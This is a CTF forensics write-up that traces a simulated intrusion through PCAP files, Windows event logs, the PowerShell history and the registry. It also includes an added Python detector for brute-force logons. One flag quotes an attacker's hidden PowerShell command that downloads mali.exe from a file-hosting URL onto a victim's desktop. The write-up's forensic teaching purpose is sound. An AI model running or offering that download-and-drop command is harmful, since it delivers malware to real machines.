ICMTC CTF 2023 Qualifications | Forensics writeup

Mohamed Elmasry
Jul 4, 2023


Hi People :D

This writeup covers 9 out of the 14 forensic challenges included in the Qualifications phase of ICMTC CTF 2023. The challenges primarily focused on log analysis.

Let’s begin our journey :D

[*] MalDoc (Warmup)

==========================

The ZIP file contains a PCAP file, so let’s open it in Wireshark and see what’s going on.

I consistently love to check the files within the PCAP and try to export them first, and fortunately, the solution was at this point :).

We can see all the files that were transferred over HTTP within the PCAP from File > Export Objects > HTTP.

We have a TXT file named malicious.txt, so let’s export it by clicking the Save button.

We have an encoded string within the malicious.txt file that we need to analyze.

The encoded string appears to be Base64. Let’s decode it with any suitable tool (such as the one I used), and here is the flag :D.

Flag: EGCERT{Pawned}

[*] DownloadedMalware (Easy)

======================================

The ZIP file contains one text file and two directories:

desc.txt: the description of the challenge.

config: contains some useless files XD.

winevt: contains Windows Event Logs.

I have searched within the PowerShell logs and process creation logs to identify any suspicious processes that may have downloaded the file, but I found nothing :(.

Afterwards, my friend enlightened me about BITS (Background Intelligent Transfer Service), which could have been used for the download.

I immediately headed to the log files and found one related to the BITS client process.

The first event indicates that the DownloadingMalware task concluded at 10:04:04 (UTC+2), and this is the first segment of the flag. However, since the description states that the time must be given in UTC, the equivalent is 08:04:04.

For the second part, the challenge asks for the tool that was used to download the file. We know it was BITS, but the process itself is called bitsadmin.

Flag: EGCERT{08:04:04_bitsadmin}

[*] Pivoting-1 (Medium)

=============================

This is a chain of 7 challenges labeled from Pivoting-1 to Pivoting-7. Let’s begin from the start.

In this chain of challenges, we are provided with three directories: DC01, Workstation_1, and Workstation_2.

Within the DC01 directory, we found the eventlogs and registry folders. Our focus will be on the eventlogs folder, since we are tasked with identifying the protocol used for logging on.

Logon events are well known and can be found within the Security log (Security.evtx) inside the \DC01\eventlogs\Logs folder.

Since we are searching for logon events, we are particularly interested in event IDs 4624 and 4648.

Here we can see a logon attempted using explicit credentials, and it appears to be coming over SSH.

Flag: EGCERT{ssh}

[*] Pivoting-2 (Medium)

=============================

Within the Workstation_1 directory, we found eventlogs, PowerShell, and registry folders. The PowerShell folder looked suspicious enough to make me check it first XD.

Inside the PowerShell folder, there is a subfolder named PSReadLine. Within that folder, there is a text file called ConsoleHost_history.txt, which contains the history of PowerShell commands previously executed on the machine.

The command inside ConsoleHost_history.txt downloads a malicious Python script and saves it to C:\Program Files\atx_1.py, which is the full path we are looking for.

Flag: EGCERT{C:\Program Files\atx_1.py}

[*] Pivoting-3 & Pivoting-4 (Medium)

============================================

Once again, let’s navigate to the DC01 event logs, but this time we will focus specifically on the Windows PowerShell log (\DC01\eventlogs\Logs\Windows PowerShell.evtx), since the challenge mentions a “command”.

Fortunately, both the command and the name of the file appear in one of the PowerShell events.

Pivoting-3 Flag: EGCERT{mali.exe}

Pivoting-4 Flag: EGCERT{powershell.exe -w hidden -noni -nop -exec EX https://www.mediafire.com/file/3bytgnxqzimrns0/mali.exe C:\Users\Administrator\Desktop\mali.exe}

[*] Pivoting-5 (Medium)

=============================

Similar to DC01, within the Workstation_2 directory, we also have eventlogs and registry folders.

After some log analysis, I noticed a significant number of failed logon attempts (Event ID 4625) coming from a single device within a short period of time (and the device name is kali, so it’s sus enough XD). This behavior indicates a brute-force attack.

Flag: EGCERT{Brute Force}
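The pattern above (many 4625 failures from one source in a short window) is easy to turn into a detector. The following is an added example, not code from the writeup: it runs a sliding-window count per source over Security events exported to XML. The record shape, host names, IPs and timestamps are constructed assumptions (the Microsoft XML namespace is omitted for brevity).

```python
# Added example: sliding-window brute-force detector over Security events
# exported to XML (constructed shape; real evtx exports carry a namespace).
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

def _rec(eid, ts, user, host, ip):
    return (f'<Event><System><EventID>{eid}</EventID>'
            f'<TimeCreated SystemTime="{ts}"/></System><EventData>'
            f'<Data Name="TargetUserName">{user}</Data>'
            f'<Data Name="WorkstationName">{host}</Data>'
            f'<Data Name="IpAddress">{ip}</Data></EventData></Event>')

# Constructed sample: six 4625 failures from "kali" within 15 s, one stray
# failure from another host, and a 4624 success that the detector must ignore.
SAMPLE_XML = "<Events>" + "".join(
    [_rec(4625, f"2023-06-20T10:00:{s:02d}Z", "Administrator", "kali",
          "192.168.118.10") for s in (1, 4, 7, 10, 13, 16)]
    + [_rec(4625, "2023-06-20T09:30:00Z", "bob", "WS-FINANCE", "192.168.118.42"),
       _rec(4624, "2023-06-20T10:00:20Z", "Administrator", "kali",
            "192.168.118.10")]) + "</Events>"

def parse_events(xml_text):
    """Yield (event_id, timestamp, target_user, source) per <Event>."""
    for ev in ET.fromstring(xml_text).iter("Event"):
        eid = int(ev.findtext("System/EventID"))
        ts = datetime.strptime(ev.find("System/TimeCreated").get("SystemTime"),
                               "%Y-%m-%dT%H:%M:%SZ")
        data = {d.get("Name"): d.text for d in ev.iter("Data")}
        yield eid, ts, data.get("TargetUserName"), (
            data.get("IpAddress") or data.get("WorkstationName"))

def find_bruteforce(xml_text, threshold=5, window_s=60):
    """Return {source: total_failures} for every source that produced at least
    `threshold` 4625 events inside some `window_s`-second span."""
    by_src = defaultdict(list)
    for eid, ts, _user, src in parse_events(xml_text):
        if eid == 4625:                      # failed logon only
            by_src[src].append(ts)
    hits = {}
    for src, times in by_src.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):      # sliding window [lo, hi]
            while t - times[lo] > timedelta(seconds=window_s):
                lo += 1
            if hi - lo + 1 >= threshold:
                hits[src] = len(times)
                break
    return hits
```

On the sample, only the kali source trips the default threshold; the single failure from WS-FINANCE and the successful 4624 logon do not.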

[*] Pivoting-6 (Medium)

=============================

Given the discovery of a brute force attack on Workstation_2, it appears to be the entry point for the attacker. However, Workstation_2 itself is not the answer we seek.

After some time, the admin revealed that the flag is the IP address of the entry point. Hence, our objective now is to obtain the IP address of Workstation_2.

Since we already have the registry files, I searched for a method to extract the IP address from them. My search results led me to this question on Super User, and I found this answer.

Alright, let’s navigate to the SYSTEM registry file first.

After using the Registry Explorer tool to open the registry file, we proceeded to the location mentioned in the answer.

Indeed, we found an interface that contains the local IP address at this location: SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{7f91008d-beb6-41c6-9c5e-ade2ccbd964d}

Flag: EGCERT{192.168.118.155}

[*] Pivoting-7 (Medium)

=============================

This one is more of a guessing challenge XD.

We know from the previous challenges that Workstation_2 is the entry point, so which comes next? Based on what we found earlier, it is logical to assume that Workstation_1 comes next in the sequence, rather than the domain controller. This assumption is supported by the fact that a malicious script was found downloaded to Workstation_1.

Flag: EGCERT{Workstation_2, Workstation_1, DC01}

At this point, we have reached the end of this write-up. I hope you found it enjoyable and useful ❤.

Written by Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter